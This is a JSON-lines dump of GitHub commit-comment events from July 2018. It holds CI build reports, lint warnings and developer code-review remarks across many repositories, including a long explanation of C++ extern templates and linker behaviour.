{"id":"7945188006","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29660117,"position":null,"line":null,"path":null,"commit_id":"a8f7a9f8b8d6d9406ac7958fe25a5c5751a874ec","created_at":"2018-07-10T17:08:28Z","updated_at":"2018-07-10T17:08:28Z","author_association":"NONE","body":"issue_6729 (mbadams5) - x86_64-MacOS-10.9-clang: OK (2932 of 2932 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8f7a9f8b8d6d9406ac7958fe25a5c5751a874ec-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8f7a9f8b8d6d9406ac7958fe25a5c5751a874ec-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-10T17:08:28Z"}
{"id":"7945193745","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29660124,"position":null,"line":null,"path":null,"commit_id":"fa8ff0f3384f3d7429fb61506e1db345a13bbf58","created_at":"2018-07-10T17:09:35Z","updated_at":"2018-07-10T17:09:35Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-766](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-766).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-766-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-10T17:09:35Z"}
{"id":"7945194153","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29660129,"position":null,"line":null,"path":null,"commit_id":"9d0b981289e6dca90608ae28787e262a490547ad","created_at":"2018-07-10T17:09:40Z","updated_at":"2018-07-10T17:09:40Z","author_association":"NONE","body":"157643005-ddress-limitations-and-overshooting-problem-using-ZTM1 (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2312 of 2312 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d0b981289e6dca90608ae28787e262a490547ad-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d0b981289e6dca90608ae28787e262a490547ad-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d0b981289e6dca90608ae28787e262a490547ad-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-10T17:09:40Z"}
{"id":"7945197136","type":"CommitCommentEvent","actor":{"login":"dirk-thomas"},"repo":{"name":"martins-mozeiko/rosidl_python"},"payload":{"comment":{"id":29660135,"position":4,"line":19,"path":"rosidl_generator_py/resource/_msg_pkg_typesupport_entry_point.c.em","commit_id":"3443d1cdd32b3d09deb4d2d08e18bbf63b449416","created_at":"2018-07-10T17:10:16Z","updated_at":"2018-07-10T17:10:16Z","author_association":"NONE","body":"Please move this line one up to keep the includes in alphabetical order."}},"created_at":"2018-07-10T17:10:16Z"}
{"id":"7945198845","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/icd"},"payload":{"comment":{"id":29660139,"position":null,"line":null,"path":null,"commit_id":"80fba393410d7c0f82a8d04fe12a74ba80d43c0e","created_at":"2018-07-10T17:10:35Z","updated_at":"2018-07-10T17:10:35Z","author_association":"NONE","body":"[R/datadocs.R:147:1:](https://github.com/jackwasey/icd/blob/80fba393410d7c0f82a8d04fe12a74ba80d43c0e/R/datadocs.R#L147) *style:* **Lines should not be more than 120 characters.**\n```r\n​#'   \\url{https://www.cms.gov/Research-Statistics-Data-and-Systems/Statistics-Trends-and-Reports/Reports/Downloads/Pope_2000_2.pdf}\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-10T17:10:35Z"}
{"id":"7945200917","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29660144,"position":null,"line":null,"path":null,"commit_id":"9d0b981289e6dca90608ae28787e262a490547ad","created_at":"2018-07-10T17:11:01Z","updated_at":"2018-07-10T17:11:01Z","author_association":"NONE","body":"157643005-ddress-limitations-and-overshooting-problem-using-ZTM1 (lgu1234) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d0b981289e6dca90608ae28787e262a490547ad-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-10T17:11:01Z"}
{"id":"7945209386","type":"CommitCommentEvent","actor":{"login":"edo22766"},"repo":{"name":"edo22766/-https-github.com-TalentoBogotaFedesoft-UAC-104-grupo-1"},"payload":{"comment":{"id":29660158,"position":null,"line":null,"path":null,"commit_id":"f101aff74346979b486ed44ba2995668a83d70d1","created_at":"2018-07-10T17:12:34Z","updated_at":"2018-07-10T17:12:34Z","author_association":"OWNER","body":"aumentar la\r\nsensibilización hacia la ciudadanía para que pueda actuar\r\nfirmemente ante cualquier abuso hacia la mujer, para que\r\ndenuncie activamente los casos de violencia y se proteja la\r\nintegridad de las madres cabeza de familia. También es esencial\r\neducar adecuadamente a los hombres para que cambien sus\r\ninaceptables comportamientos."}},"created_at":"2018-07-10T17:12:34Z"}
{"id":"7945210862","type":"CommitCommentEvent","actor":{"login":"gbicskei"},"repo":{"name":"openhab/openhab2-addons"},"payload":{"comment":{"id":29660163,"position":null,"line":null,"path":null,"commit_id":"c9312e6b141cb12a4f8b5c533a7543e6fe2fe0f0","created_at":"2018-07-10T17:12:51Z","updated_at":"2018-07-10T17:12:51Z","author_association":"NONE","body":"Signed-off-by: Gabor Bicskei <gbicskei@gmail.com> "}},"created_at":"2018-07-10T17:12:51Z"}
{"id":"7945212818","type":"CommitCommentEvent","actor":{"login":"dirk-thomas"},"repo":{"name":"martins-mozeiko/rclpy"},"payload":{"comment":{"id":29660171,"position":59,"line":114,"path":"rclpy/src/rclpy/_rclpy.c","commit_id":"303b4f25f68470f816eb0c3a9d3da7ea84c0b2dc","created_at":"2018-07-10T17:13:13Z","updated_at":"2018-07-10T17:13:13Z","author_association":"NONE","body":"These four functions do basically the same. Maybe it would make sense to implement the logic in a macros and then let the four functions just invoke the macro with the attribute name."}},"created_at":"2018-07-10T17:13:13Z"}
{"id":"7945217898","type":"CommitCommentEvent","actor":{"login":"lithammer"},"repo":{"name":"lithammer/NeavUI"},"payload":{"comment":{"id":29660176,"position":null,"line":null,"path":null,"commit_id":"da16116714d0139850161e14468860d9c33a1e07","created_at":"2018-07-10T17:14:10Z","updated_at":"2018-07-10T17:14:10Z","author_association":"OWNER","body":"Thanks :)"}},"created_at":"2018-07-10T17:14:10Z"}
{"id":"7945222763","type":"CommitCommentEvent","actor":{"login":"AGraber"},"repo":{"name":"pawn-lang/YSI-Includes"},"payload":{"comment":{"id":29660188,"position":null,"line":null,"path":null,"commit_id":"3baec21f8ca0bcf3c44473904fbc624145773a97","created_at":"2018-07-10T17:15:08Z","updated_at":"2018-07-10T17:15:08Z","author_association":"NONE","body":"Although the comment was initially a joke, it will surely be more friendly to have a warning instead. This is a new version anyways so people should also revise their stuff before moving into 5.x"}},"created_at":"2018-07-10T17:15:08Z"}
{"id":"7945223078","type":"CommitCommentEvent","actor":{"login":"petriaarnio"},"repo":{"name":"artoh/kitupiikki"},"payload":{"comment":{"id":29660189,"position":null,"line":null,"path":null,"commit_id":"df3ced41cb141c65ef5be77a5275181118e86626","created_at":"2018-07-10T17:15:11Z","updated_at":"2018-07-10T17:15:11Z","author_association":"NONE","body":"Hyvä huomio, luotin liikaa staattiseen koodianalysaattoriin."}},"created_at":"2018-07-10T17:15:11Z"}
{"id":"7945224589","type":"CommitCommentEvent","actor":{"login":"CezaryGapinski"},"repo":{"name":"DISTORTEC/distortos"},"payload":{"comment":{"id":29660192,"position":null,"line":null,"path":null,"commit_id":"2a564c0638f3b48a3af0e58187128522efb0ad3f","created_at":"2018-07-10T17:15:27Z","updated_at":"2018-07-10T17:15:27Z","author_association":"CONTRIBUTOR","body":"That would be nice to replace spaces with tabulations in ;)\r\nSpiDeviceProxy.hpp\r\nline 72\r\nSpiDeviceSelectGuard.hpp\r\nlines 68, 70\r\nSpiMasterProxy.hpp\r\nline 115"}},"created_at":"2018-07-10T17:15:27Z"}
{"id":"7945228361","type":"CommitCommentEvent","actor":{"login":"edo22766"},"repo":{"name":"edo22766/-https-github.com-TalentoBogotaFedesoft-UAC-104-grupo-1"},"payload":{"comment":{"id":29660202,"position":null,"line":null,"path":null,"commit_id":"f101aff74346979b486ed44ba2995668a83d70d1","created_at":"2018-07-10T17:16:10Z","updated_at":"2018-07-10T17:16:10Z","author_association":"OWNER","body":"El  objetivo propuesto es Aumentar la sensación de seguridad, apoyo y posibilidad de\r\ndenuncia por las mujeres que están sufriendo este tipo de\r\nsituaciones.\r\nCon apoyo de la tecnologia se realizar una aplicacion movil que tiene por objetivo establecer un canal de comunicacion adecuado amigable sensible a la situacion y que preste apoyo en radicacion de denuncias, promover historias de vida ejemplo para sensibilizar el deber de denunciar y que efectivamente sea una respuesta a la problematica, canalizando informacion y direccionando a los entes responsables del seguimiento, apoyo y ayuda."}},"created_at":"2018-07-10T17:16:10Z"}
{"id":"7945229075","type":"CommitCommentEvent","actor":{"login":"Mezy"},"repo":{"name":"Mezy/BungeecordPartyAndFriends"},"payload":{"comment":{"id":29660207,"position":null,"line":null,"path":null,"commit_id":"09e468f8699a9c367234ecf393610c23e0b4f63a","created_at":"2018-07-10T17:16:19Z","updated_at":"2018-07-10T17:16:19Z","author_association":"OWNER","body":"Updated"}},"created_at":"2018-07-10T17:16:19Z"}
{"id":"7945232143","type":"CommitCommentEvent","actor":{"login":"whitequark"},"repo":{"name":"whitequark/parser"},"payload":{"comment":{"id":29660235,"position":null,"line":null,"path":null,"commit_id":"d6d3d4533450ea91334d8888a80362a52dbc5f0d","created_at":"2018-07-10T17:16:56Z","updated_at":"2018-07-10T17:16:56Z","author_association":"OWNER","body":"Yes. The changelog script seems buggy..."}},"created_at":"2018-07-10T17:16:56Z"}
{"id":"7945235077","type":"CommitCommentEvent","actor":{"login":"laurenzlong"},"repo":{"name":"firebase/firebase-tools"},"payload":{"comment":{"id":29660256,"position":4,"line":6,"path":".travis.yml","commit_id":"7a96f2d31cb6c4a0c1ee153b57d727ef19e8eee8","created_at":"2018-07-10T17:17:32Z","updated_at":"2018-07-10T17:17:32Z","author_association":"MEMBER","body":"I'm sorry could you clarify what you mean?"}},"created_at":"2018-07-10T17:17:32Z"}
{"id":"7945235144","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29660258,"position":null,"line":null,"path":null,"commit_id":"d2faee7c49e994b9f797fa77e79d609e5de3811e","created_at":"2018-07-10T17:17:32Z","updated_at":"2018-07-10T17:17:32Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-322](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-322).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-322-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-10T17:17:32Z"}
{"id":"7945235662","type":"CommitCommentEvent","actor":{"login":"buske"},"repo":{"name":"phenotips/clinical-text-analysis-extension"},"payload":{"comment":{"id":29660261,"position":null,"line":null,"path":null,"commit_id":"f31b93b9ba1bebb177e3f926635e65fc3292c169","created_at":"2018-07-10T17:17:38Z","updated_at":"2018-07-10T17:17:38Z","author_association":"MEMBER","body":"This was necessary for the left and right angle brackets to display nicely"}},"created_at":"2018-07-10T17:17:38Z"}
{"id":"7945237567","type":"CommitCommentEvent","actor":{"login":"janus2"},"repo":{"name":"HaikuArchives/FilWip"},"payload":{"comment":{"id":29660271,"position":null,"line":null,"path":null,"commit_id":"f3dea32be612e202e98a9db66c973c956fab4e9b","created_at":"2018-07-10T17:18:01Z","updated_at":"2018-07-10T17:18:01Z","author_association":"MEMBER","body":"I think this is a gcc7 error.\r\nIt complains that a variable has the same name in two different functions."}},"created_at":"2018-07-10T17:18:01Z"}
{"id":"7945248067","type":"CommitCommentEvent","actor":{"login":"orahman2"},"repo":{"name":"HashimR/PrayScribe"},"payload":{"comment":{"id":29660335,"position":null,"line":null,"path":null,"commit_id":"728631a483156ea5a88fa417d9a88e8372648036","created_at":"2018-07-10T17:20:02Z","updated_at":"2018-07-10T17:20:02Z","author_association":"COLLABORATOR","body":"Why did you make everything static?"}},"created_at":"2018-07-10T17:20:02Z"}
{"id":"7945251611","type":"CommitCommentEvent","actor":{"login":"sev-"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":29660355,"position":null,"line":null,"path":null,"commit_id":"e105c2a78ae14a0b3c6645fe98db98f3c299f13f","created_at":"2018-07-10T17:20:43Z","updated_at":"2018-07-10T17:20:43Z","author_association":"MEMBER","body":"I think, we need to tell Cyan about this ASAP, so they bump the executable in the release."}},"created_at":"2018-07-10T17:20:43Z"}
{"id":"7945255391","type":"CommitCommentEvent","actor":{"login":"mppf"},"repo":{"name":"chapel-lang/chapel"},"payload":{"comment":{"id":29660369,"position":27,"line":564,"path":"runtime/src/qio/sys.c","commit_id":"a5dd86f07c5ae32f4a999c3dcb493a64097b19c6","created_at":"2018-07-10T17:21:28Z","updated_at":"2018-07-10T17:21:28Z","author_association":"CONTRIBUTOR","body":"Here I'm expecting some ifdef'ing about the POSIX version.\r\nIf it's 2017 version or newer, we use st_atim. If it's older, we use st_atime and set the nanoseconds to 0."}},"created_at":"2018-07-10T17:21:28Z"}
{"id":"7945257151","type":"CommitCommentEvent","actor":{"login":"orahman2"},"repo":{"name":"HashimR/PrayScribe"},"payload":{"comment":{"id":29660371,"position":12,"line":23,"path":"PrayScribe/Views/PrayerTimesViewController.swift","commit_id":"728631a483156ea5a88fa417d9a88e8372648036","created_at":"2018-07-10T17:21:49Z","updated_at":"2018-07-10T17:21:49Z","author_association":"COLLABORATOR","body":"self.timingsViewModel = TimingsViewModel()\r\ntimingsViewModel.getAdhanTimings(updateMethod: update)"}},"created_at":"2018-07-10T17:21:49Z"}
{"id":"7945262019","type":"CommitCommentEvent","actor":{"login":"timelyportfolio"},"repo":{"name":"BigFatDog/parcoords-es"},"payload":{"comment":{"id":29660382,"position":28,"line":28,"path":"src/brush/1d/brushFor.js","commit_id":"d95b853da22cb9c80f4d0e2905673ca2b1f773d8","created_at":"2018-07-10T17:22:45Z","updated_at":"2018-07-10T17:22:45Z","author_association":"NONE","body":"\r\n@BigFatDog, this `call` works perfectly internally within parallel-coordinates.  I struggle though with determining externally which brush we are working with `on('brushstart', ...)` and `on('brushend', ...).  This [example](https://bl.ocks.org/timelyportfolio/81410dcc0f0b530b036c2537eb9cbd8f) (with a modified old parallel-coordinates) demonstrates the objective.  Would it cause any problems to change\r\n\r\n```\r\nevents.call('brushstart', pc, config.brushed);\r\n```\r\n\r\nto\r\n\r\n```\r\nevents.call('brushstart', pc, config.brushed, arguments);\r\n```\r\n\r\nwhich leverages https://github.com/d3/d3-brush/blob/master/src/brush.js#L286??  If we do this, then the second argument to `pc.on('brushend', function(a, args) {}` will be the arguments which contain dimension.  I am happy to submit a pull if you agree this is worthwhile."}},"created_at":"2018-07-10T17:22:45Z"}
{"id":"7945262374","type":"CommitCommentEvent","actor":{"login":"iainfoulds"},"repo":{"name":"MicrosoftDocs/azure-docs"},"payload":{"comment":{"id":29660383,"position":52,"line":45,"path":"articles/aks/kubernetes-dashboard.md","commit_id":"251c493ae4c640b674eb9572f50298e661f585f5","created_at":"2018-07-10T17:22:49Z","updated_at":"2018-07-10T17:22:49Z","author_association":"CONTRIBUTOR","body":"This was a quick update with a link to the Kubernetes docs on authentication. There's a more complete doc update that should publish later today or tomorrow that shows a specific example of securing the authentication components."}},"created_at":"2018-07-10T17:22:49Z"}
{"id":"7945263931","type":"CommitCommentEvent","actor":{"login":"lianglee"},"repo":{"name":"opensource-socialnetwork/opensource-socialnetwork"},"payload":{"comment":{"id":29660385,"position":null,"line":null,"path":null,"commit_id":"206fdfe36817a5bd6599667f1ed59a03b14b0feb","created_at":"2018-07-10T17:23:08Z","updated_at":"2018-07-10T17:23:08Z","author_association":"MEMBER","body":"Load session start after classes #1318\r\nRestrict calling start.php directly from browser #1315\r\n"}},"created_at":"2018-07-10T17:23:08Z"}
{"id":"7945267339","type":"CommitCommentEvent","actor":{"login":"timelyportfolio"},"repo":{"name":"BigFatDog/parcoords-es"},"payload":{"comment":{"id":29660394,"position":37,"line":37,"path":"src/brush/1d/brushFor.js","commit_id":"d95b853da22cb9c80f4d0e2905673ca2b1f773d8","created_at":"2018-07-10T17:23:48Z","updated_at":"2018-07-10T17:23:48Z","author_association":"NONE","body":"@BigFatDog, see above."}},"created_at":"2018-07-10T17:23:48Z"}
{"id":"7945268979","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29660400,"position":1,"line":93,"path":"Source/Foundation/bsfUtility/String/BsStringID.h","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T17:24:08Z","updated_at":"2018-07-10T17:24:08Z","author_association":"CONTRIBUTOR","body":"The basic linker rules would apply when talking about the extern template stuff.\r\n\r\nBasically, for a given invocation of the compiler, you're translating a single cpp file into a single .o (or obj, for msvc) file.\r\n\r\nThe compiler doesn't have *any* idea what other cpp files will be included in your final output, so the original behavior was to simply generate code for everything that it could see that had a definition (as opposed to a declaration), and transitively generate code for any template types as needed.\r\n\r\nThis, of course, has some weird interactions with the one-definition-rule, and it's how you end up with linker errors when you forget the inline keyword and such.\r\n\r\nThe inline keyword, of course, doesn't actually mean the compiler is going to inline the function. (Badddddd name choice) Instead what it means is \"It's ok if there are multiple definitions of this symbol\" By convention all code generated for an inline symbol (function, so on) need to be identical. E.g. no using clever macro screwery to change an int to a float in one of your CPP files. The compiler has no way to find out you've done this, and the linker won't bother to check because it would be expensive and not worth it (Maybe some linkers do? don't know).\r\n\r\nIf you do that, the linker is going to arbitrarily pick one version of your inline symbol as the \"official\" one, and then throw the rest away.\r\n\r\nThe mechanism that the compiler and linker use to do all this \"one definition rule\" machinery is to have the compiler generate any symbols that can have only a single definition as a T or t symbol (Or various others, sometimes. see here: https://sourceware.org/binutils/docs/binutils/nm.html) which says \"Only one of these.\".\r\n\r\nAny symbol which can have more than one (identical, or you're in trouble) definition is defined in the .o file as a w or W symbol. Stands for \"weak\" symbol. Weak symbols follow the behavior where all but one of them is tossed out when the compile-time linker runs.\r\n\r\nObviously you want to have very tiny functions in the header file, to give the compiler some room to do *Actual* function inlining. But it does come at the trade off of giving the linker a bit of extra work to do. Generally it's worth it.\r\n\r\nTemplate functions are done the same way. By default, the compiler will always generate code for any template function or object that it needs use. These functions / objects are generated as weak symbols in the .o file, and then at link time all but one of them get thrown away.\r\n\r\nBut template instantiation is significantly more expensive than just normal inline symbols, and can take a very long time to compile (e.g. the codebase I work on for work, takes literally, i kid you not, 3 days to build. It's just freaking awful, and I researched all of this stuff to get our build times down which is slowly paying off).\r\n\r\nSo you really don't want the compiler to be instantiating every single template type for EVERY SINGLE .o file. Especially not expensive ones which have some 2-dozen different functions and the same instantiation is used in 3 dozen places. That's just not worth it even if you might get a little bit of function inlining.\r\n\r\nSo the extern template feature (new with c++11) is kind of a hybrid between the \"inline\" keyword, where you can \"violate\" the one definition rule, and a \"normal\" function definition. It's basically a promise to the compiler for OTHER translation units \"Really, I'll make sure that this exists somewhere\".\r\n\r\nSo instead of each .o file for your entire codebase generating a copy of the template, it gets generated only a single time in the cpp file where you do an explicit instantiation.\r\n\r\nThis is even better than the normal linker behavior of each dll/exe still having it's own version of the symbol, (because the compile-time linker doesn't know there are other dlls/exes) which the runtime linker throws away (so you still only have the one). With extern templates, if your compiler is doing it's job properly, you'll literally have exactly one instance of the symbol. (Unless you explicitly instantiate the template in multiple cpp files. Still allowed to do that).\r\n\r\nSo to directly answer your question, if you're NOT using extern templates, the linker will still *always* throw away all but a single instance (per dll/exe) of any template symbols, because otherwise you get one-definition-rule violations. And that's just the normal default behavior of c++.\r\n\r\nThe extern template feature lets you get clever with how things happen under the hood, with the trade off being\r\n\r\n\"Do I want to risk the compiler not doing function inlining? Or would I rather save on code-gen time?\"\r\n\r\n(I'm pretty sure that a properly written compiler will still do function inlining for particularly small template functions that you're \"extern\"ing. But at least MSVC 2015 doesn't actually do that, because it's stupid. I haven't tried gcc / clang / msvc2017 yet.)"}},"created_at":"2018-07-10T17:24:08Z"}
{"id":"7945296400","type":"CommitCommentEvent","actor":{"login":"FreddieChopin"},"repo":{"name":"DISTORTEC/distortos"},"payload":{"comment":{"id":29660475,"position":null,"line":null,"path":null,"commit_id":"2a564c0638f3b48a3af0e58187128522efb0ad3f","created_at":"2018-07-10T17:29:26Z","updated_at":"2018-07-10T17:29:26Z","author_association":"CONTRIBUTOR","body":"fixed, thanks!\r\n\r\nI'm _REALLY_ surprised that there ware _only_ these 4 places with spaces instead of tabs in the code (;"}},"created_at":"2018-07-10T17:29:26Z"}
{"id":"7945296979","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-latinLit"},"payload":{"comment":{"id":29660476,"position":null,"line":null,"path":null,"commit_id":"6fd8fa187c746676f8494a514a456f6684328c53","created_at":"2018-07-10T17:29:32Z","updated_at":"2018-07-10T17:29:32Z","author_association":"NONE","body":"## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `lat`     |       -1 |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-latinLit/4434)*\n"}},"created_at":"2018-07-10T17:29:32Z"}
{"id":"7945297406","type":"CommitCommentEvent","actor":{"login":"tykeal"},"repo":{"name":"opendaylight/docs"},"payload":{"comment":{"id":29660478,"position":2,"line":1,"path":"docs/developer-guide/alto-developer-guide.rst","commit_id":"2636b86495c4374f39bea79549205ecbaed8ed29","created_at":"2018-07-10T17:29:37Z","updated_at":"2018-07-10T17:29:37Z","author_association":"MEMBER","body":"@chenliang86 Please take your questions to the mailing list https://lists.opendaylight.org . No developers will get any sort of notice of your request for help on our mirrors."}},"created_at":"2018-07-10T17:29:37Z"}
{"id":"7945297807","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29660480,"position":1,"line":93,"path":"Source/Foundation/bsfUtility/String/BsStringID.h","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T17:29:41Z","updated_at":"2018-07-10T17:29:41Z","author_association":"CONTRIBUTOR","body":"BTW. Generally with extern templates, you overwhelmingly want to use it in lower level libraries, because it has an effect on every cpp file that includes that header. Lower level librarys get included by the most cpp files, therefore, you get the biggest bang for buck there.\r\n\r\nNot that there's no benefit in using the feature in high level code too. Just not as big of one."}},"created_at":"2018-07-10T17:29:41Z"}
{"id":"7945298740","type":"CommitCommentEvent","actor":{"login":"vendethiel"},"repo":{"name":"MoarVM/MoarVM"},"payload":{"comment":{"id":29660482,"position":4,"line":47,"path":"src/core/oplist","commit_id":"e838ff93c9618dab840b5de3ec3548f0eb501ee1","created_at":"2018-07-10T17:29:51Z","updated_at":"2018-07-10T17:29:51Z","author_association":"CONTRIBUTOR","body":"typo \"menas\""}},"created_at":"2018-07-10T17:29:51Z"}
{"id":"7945300627","type":"CommitCommentEvent","actor":{"login":"alexvicegrab"},"repo":{"name":"MicrosoftDocs/azure-docs"},"payload":{"comment":{"id":29660489,"position":52,"line":45,"path":"articles/aks/kubernetes-dashboard.md","commit_id":"251c493ae4c640b674eb9572f50298e661f585f5","created_at":"2018-07-10T17:30:15Z","updated_at":"2018-07-10T17:30:15Z","author_association":"NONE","body":"Thank you, @iainfoulds !"}},"created_at":"2018-07-10T17:30:15Z"}
{"id":"7945302897","type":"CommitCommentEvent","actor":{"login":"bgK"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":29660497,"position":null,"line":null,"path":null,"commit_id":"e105c2a78ae14a0b3c6645fe98db98f3c299f13f","created_at":"2018-07-10T17:30:40Z","updated_at":"2018-07-10T17:30:40Z","author_association":"MEMBER","body":"I am planning to send them a new Riven version soon.\n\n2018-07-10 19:20 GMT+02:00 Eugene Sandulenko <notifications@github.com>:\n\n> I think, we need to tell Cyan about this ASAP, so they bump the executable\n> in the release.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/scummvm/scummvm/commit/e105c2a78ae14a0b3c6645fe98db98f3c299f13f#commitcomment-29660355>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AADMRtfq8zxe-QV_Slx4jpBfQQuEXv2tks5uFOJsgaJpZM4VJz1N>\n> .\n>\n"}},"created_at":"2018-07-10T17:30:40Z"}
{"id":"7945304586","type":"CommitCommentEvent","actor":{"login":"orso82"},"repo":{"name":"gafusion/omas"},"payload":{"comment":{"id":29660501,"position":null,"line":null,"path":null,"commit_id":"32665bebbb0b46bb70c3539767723fbadf6d84c5","created_at":"2018-07-10T17:31:00Z","updated_at":"2018-07-10T17:31:00Z","author_association":"MEMBER","body":"yes"}},"created_at":"2018-07-10T17:31:00Z"}
{"id":"7945305264","type":"CommitCommentEvent","actor":{"login":"MasterQ32"},"repo":{"name":"Acknex/LotterShock"},"payload":{"comment":{"id":29660504,"position":null,"line":null,"path":null,"commit_id":"d5ece1204d007b3f646517cb31ce0cc385bcc893","created_at":"2018-07-10T17:31:08Z","updated_at":"2018-07-10T17:31:08Z","author_association":"CONTRIBUTOR","body":"@mk1x86, ich glaube du hast UTF-8-kodierte Dateien hochgeladen (falls du das mit GitHub bearbeitet hast)\r\nCredits sind grade broken"}},"created_at":"2018-07-10T17:31:08Z"}
{"id":"7945307209","type":"CommitCommentEvent","actor":{"login":"maicki"},"repo":{"name":"maicki/OrderedDictionary"},"payload":{"comment":{"id":29660511,"position":null,"line":null,"path":null,"commit_id":"f431034702c09e33176097db1fb9a1f85e61513f","created_at":"2018-07-10T17:31:29Z","updated_at":"2018-07-10T17:31:29Z","author_association":"OWNER","body":"@lukaskubanek tbh - I don't remember anymore exactly. It maybe Swift version conflict as I had to change it due to compiler issues that happened on an earlier version of Xcode before I updated to latest."}},"created_at":"2018-07-10T17:31:29Z"}
{"id":"7945312709","type":"CommitCommentEvent","actor":{"login":"buddhi1980"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":29660520,"position":null,"line":null,"path":null,"commit_id":"4dc59edd4e8a1412a476c21f4731f80df9b06c2d","created_at":"2018-07-10T17:32:33Z","updated_at":"2018-07-10T17:32:33Z","author_association":"OWNER","body":"Everything is ok. Probably you did some changes in the same time as I made changes in mesh_export.cpp. \r\nYou just merged mych changes with your local version."}},"created_at":"2018-07-10T17:32:33Z"}
{"id":"7945313869","type":"CommitCommentEvent","actor":{"login":"tim-salabim"},"repo":{"name":"timelyportfolio/r-spatial.org"},"payload":{"comment":{"id":29660524,"position":null,"line":null,"path":null,"commit_id":"12117512c8f104f2c60f013020beac5eb2ab138a","created_at":"2018-07-10T17:32:46Z","updated_at":"2018-07-10T17:32:46Z","author_association":"NONE","body":"@timelyportfolio all good to go from my side! Thanks for the write-up! "}},"created_at":"2018-07-10T17:32:46Z"}
{"id":"7945314692","type":"CommitCommentEvent","actor":{"login":"linux4life798"},"repo":{"name":"OpenChirp/openchirp_rest"},"payload":{"comment":{"id":29660525,"position":null,"line":null,"path":null,"commit_id":"6b2b1eaec2713264bf03d434799ca4988f916ed1","created_at":"2018-07-10T17:32:55Z","updated_at":"2018-07-10T17:32:55Z","author_association":"MEMBER","body":"Closes #38 "}},"created_at":"2018-07-10T17:32:55Z"}
{"id":"7945317698","type":"CommitCommentEvent","actor":{"login":"bossloper"},"repo":{"name":"evolution-cms/evolution"},"payload":{"comment":{"id":29660536,"position":null,"line":null,"path":null,"commit_id":"63b229bf35d7278a896dd88b319ec43a21e5bfdd","created_at":"2018-07-10T17:33:31Z","updated_at":"2018-07-10T17:33:31Z","author_association":"NONE","body":"I don't think this is your new code? It does not add the extra button."}},"created_at":"2018-07-10T17:33:31Z"}
